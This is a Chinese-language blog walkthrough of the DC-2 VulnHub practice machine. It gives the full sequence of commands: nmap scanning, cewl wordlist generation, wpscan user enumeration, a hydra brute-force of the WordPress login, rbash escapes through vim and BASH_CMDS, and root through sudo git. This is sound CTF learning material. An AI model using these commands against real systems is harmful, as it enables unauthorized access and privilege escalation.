bilala's blog
0%

DC-2

发表于 分类于 Valine:

0x00 前言

摆了好几天了,该开始学习了,先把摆之前没做完的DC2搞完,当时做到rbash部分,然后当时卡住了,今晚突然就一下子就逃逸出来了=.=,然后接下来就是很顺畅的拿到了root结束了这个靶机

0x01 靶机介绍

靶机难度:简单(https://github.com/Ignitetechnologies/CTF-Difficulty

靶机介绍:https://www.vulnhub.com/entry/dc-2,311/

介绍里有说要改hosts文件

image-20220412222121233

(做之前记得改一下,方法百度)

这个靶机同样也是5个flag👻

0x02 信息收集

这里就把端口探测也并进来了

先找ip

1
nmap -n -sn 192.168.189.0/24

image-20220412223126738

然后对靶机进行端口探测

1
nmap -sS -sV -O -p- 192.168.189.130

image-20220412223320477

整合端口信息

1
2
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)

就俩端口,那直接从web口开始吧

0x03 获取shell

web的首页有flag1

image-20220412224500496 
1
2
3
4
5
6
7
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

这里有提示利用cewl工具来获取密码字典(kali自带此工具)(工具的介绍和用法在参考文章中有放)

1
2
cewl http://dc-2 -w pass.txt
// -w:将得到的字典保存为文件pass.txt

同时我们可以发现这个网站是wordpress搭的,直接wpscan扫用户名(因为密码字典上边搞出来了,差用户名)

1
wpscan --url dc-2 -e u

image-20220412225638922

将这三个作为用户名字典,再利用hydra工具爆破

1
2
3
4
hydra -L user.txt -P pass.txt dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^:is incorrect'
//这里因为是对web的表单进行爆破,所以参数多一点
// -L,-P不用多说,后面跟着的dc-2就是域名,再后面就是爆破对象是http-post的表单的意思
//最后跟着的引号内容为三个字段(冒号隔开的),①为表单对应的路径,②为POST的内容(^USER^和^PASS^无需更改),③为错误时的回显

image-20220412230607360

最后得到结果

image-20220412231741090

jerry账户登录进去后可以看到flag2

image-20220412231900898 
1
2
3
If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

然后接下来在后台翻,没找到什么可以利用的地方,尝试用爆出来的账号密码去登录ssh(还一个ssh端口)

最后发现tom账户可以登录进去,拿到shell

image-20220412232104934

0x04 权限提升

这里进去后发现tom的shell是rbash,中文意思就是受限制的shell

image-20220412232303548

上网找到这篇文章

利用其中的vi命令来逃逸

1
2
3
vim 1
:set shell=/bin/bash
:shell

image-20220412233644342

可以看到这里我们的报错已经变成bash了,cat命令不能用,用/bin/cat命令得到flag3

image-20220412233814513

1
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

(当然在rbash下用vi flag3.txtless flag3.txt也能读取到flag3内容)

也可以利用BASH_CMDS命令来逃逸rbash

1
2
3
4
tom@DC-2:~$ BASH_CMDS[bilala]=/bin/sh
tom@DC-2:~$ bilala
$ /bin/cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

逃逸出来后(还可以export环境变量,不过这里已经能用su命令了不用导入也没事),根据flag3的提示需要su来切换用户

账号密码就是刚刚爆出的

1
/bin/su - jerry

在jerry的家目录下看到flag4

image-20220412235117906

1
2
3
4
5
6
7
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

sudo -l查看jerry的sudo权限

image-20220412235320329

发现给了git命令,结合flag4可知,可以git提权

1
2
sudo git -p help
!/bin/bash

得到root权限的shell后,在/root中找到flag5

image-20220412235445293

1
2
3
4
5
6
7
8
9
10
11
12
13
14
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

(git提权的原理没找到文章,都只有告诉你提权操作==)

0x05 参考文章

cewl工具使用指南:https://www.freebuf.com/articles/network/190128.html

wpscan使用:https://xz.aliyun.com/t/2794

rbash逃逸:https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/

rbash逃逸:https://blog.csdn.net/qq_43168364/article/details/111830233

git提权:https://blog.csdn.net/G_Fu_Q/article/details/116276096

-------------本文结束感谢您的阅读-------------